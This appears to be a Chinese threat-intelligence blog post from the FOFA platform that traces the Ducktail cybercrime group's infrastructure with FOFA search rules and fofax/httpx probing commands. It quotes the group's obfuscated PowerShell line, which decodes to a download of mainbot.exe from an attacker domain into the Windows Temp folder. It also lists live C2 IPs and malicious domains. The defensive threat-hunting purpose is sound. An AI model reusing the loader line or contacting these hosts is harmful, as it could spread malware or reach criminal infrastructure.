▌概述
Ducktail是一个2021年被发现的网络犯罪组织,具有越南背景。该组织主要针对Facebook企业账号进行攻击,通过伪装成图片、文档等文件的恶意程序,利用鱼叉式攻击方式攻击有权管理Facebook企业账号的个人。一旦获取目标账号权限,他们就会发布广告,损害受害者声誉并获利。
本文通过分析公开的IOC进行分析,并在FOFA拓线的过程中,不仅仅发现了该组织未被覆盖的资产,还发现了该犯罪组织有对其域名资产进行反复使用的情况,该组织会对其已下线的资产重复启用。
▌线索分析思路
https://gdfsgfdrgetgergdsf.tech/file/ps/330d9d3b5819c6c71029767bfb8c0ae1.jpg
在该函数的调用过程中分析,里面的远程下载文件的参数为$cnxjunbsg + $egdac。
ownload-FileWithRetry -url ($cnxjunbsg + $egdac) -destination ($lafaelcbl + $yzabgcjvrd);
而具体参数的值为:
$cnxjunbsg=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("aHR0cDovL2dkZnNnZmRyZw=="));$egdac=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("ZXRnZXJnZHNmLnRlY2gvZmlsZS90L21haW5ib3QuZXhl"));$lafaelcbl=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("QzpcVw=="));$yzabgcjvrd=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("aW5kb3dzXFRlbXBcc3Zjekhvc3QuZXhl"));
aHR0cDovL2dkZnNnZmRyZw==ZXRnZXJnZHNmLnRlY2gvZmlsZS90L21haW5ib3QuZXhl解密为http://gdfsgfdrgetgergdsf.tech/file/t/mainbot.exe
QzpcVw==aW5kb3dzXFRlbXBcc3Zjekhvc3QuZXhl解密为C:WindowsTempsvczHost.exe
使用VT对exe进行动态分析,发现其C2 IP(138.201.8.186)
https://www.virustotal.com/gui/file/e916b412760ea5b9ab66df77808337a632c130a3d1820df2a2d4d1e5e28bc21c/behavior
分析结论
1、文件下载路径固定:/file/t/mainbot.exe/file/t/RdpService.exe/file/t/TermService.exe/file/rdpwrap.txt2、认证路径固定且返回包大小相同/api/check(hxxp://138.201.8.186/api/check [200] [355])3、域名地址均通过Cloudflare代理流量,经过CDN进行中转
▌FOFA拓线
cloudflare规则
header="HTTP/1.1 404 Not Found" && header="Server: cloudflare" && icon_hash="" && header="Transfer-Encoding: chunked" && cert.issuer!="" && cert.subject.org="" && cert.issuer.cn!="" && cert.is_valid=true && jarm="29d3dd00029d29d21c42d43d00041d44609a5a9a88e797f466e878a82e8365" && body_hash="-1840324437" && header!="X-Powered-By" && header!="Strict-Transport-Security" && header!="Pragma"
org="CLOUDFLARENET" && icon_hash="" && title="" && header_hash="-2069571899"
经过验证,两条语法规则都可以匹配到已知的IOC。
将数据取出之后对提取到的固定路径进行碰撞匹配,此处使用的工具为fofax。/file/t/mainbot.exe/api/check
碰撞出moutainseagroup.com域名可以下载该文件,并且用其它路径进行二次验证发现依然存在。使用api/check手工验证:
根据其特征确认为未知的恶意域名,在威胁情报平台进行查询时发现该域名未被覆盖。
dailyfasterauto.infogdfsgfdrgetgergdsf.techmoutainseagroup.com
C2规则
根据其本身特征进行归类,形成的语法如下:
header="404 Not Found" && header="Transfer-Encoding: chunked" && header="Server: Microsoft-IIS" && icon_hash="" && title="" && header_hash="-324809210"
fofax -q 'header="404 Not Found" && header="Transfer-Encoding: chunked" && header="Server: Microsoft-IIS" && icon_hash="" && title="" && header_hash="-324809210"' -fs 10000 | httpx -path /api/check -sc -cl -mc 200 -ml 355
118.69.35.98:8001118.69.35.98:8000138.201.8.186138.201.8.186:800023.88.71.29:8000fggfdbvcbvcbcboxes.onlinesofggfdbvcbvcbc.onlinet.sofggfdbvcbvcbc.onlinet.sofggfdbvcbvcbc.online:8000www.sofggfdbvcbvcbc.online:8000www.sofggfdbvcbvcbc.online
cat url.txt | httpx -sc -cl -path path.txt -mc 200
▌总结
通过对部分IOC进行拓线分析,我们成功发现了该组织的C2特征。并在研究过程中不仅仅发现了该组织未被覆盖标记的资产,还发现了该犯罪组织有对其域名资产进行反复使用的情况,该组织会对其已下线的资产重复启用。
这个案例,对威胁情报的分析和识别包含了二级目录碰撞等部分。结合FOFA平台的持续信息收集能力,如果组织特征未发生变化,对该语法规则进行资产监控,定期拉取数据碰撞,我们就可以动态获取最新的资产信息并及时覆盖,从而更快地获取威胁情报。
▌附录
|
域名 |
微步 |
VirusTotal |
奇安信 |
|
dailyfasterauto.info |
- |
恶意 |
APT |
|
gdfsgfdrgetgergdsf.tech |
恶意 |
恶意 |
APT |
|
moutainseagroup.com |
- |
- |
- |
|
118.69.35.98 |
- |
恶意 |
可疑 |
|
138.201.8.186 |
- |
恶意 |
APT |
|
23.88.71.29 |
恶意 |
恶意 |
APT |
|
fggfdbvcbvcbcboxes.online |
- |
恶意 |
- |
|
sofggfdbvcbvcbc.online |
- |
恶意 |
APT |
▌References:
Ducktail and Peeling the Layers of PowerShell
https://www.esentire.com/blog/ducktail-and-peeling-the-layers-of-powershell
https://twitter.com/suyog41/status/1738073411585478697
https://github.com/xiecat/fofax
▌End
欢迎各位白帽师傅们加入我们的社区大家庭,一起交流技术、生活趣事、奇闻八卦,结交无数白帽好友。
也欢迎投稿到 FOFA,审核通过后可获得F点奖励,快来加入微信群体验吧~~~
微信群:扫描下方二维码,加入 FOFA 社群!获取更多一手信息!
原文始发于微信公众号(FOFA):FOFA资产拓线实战系列:Ducktail犯罪组织
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论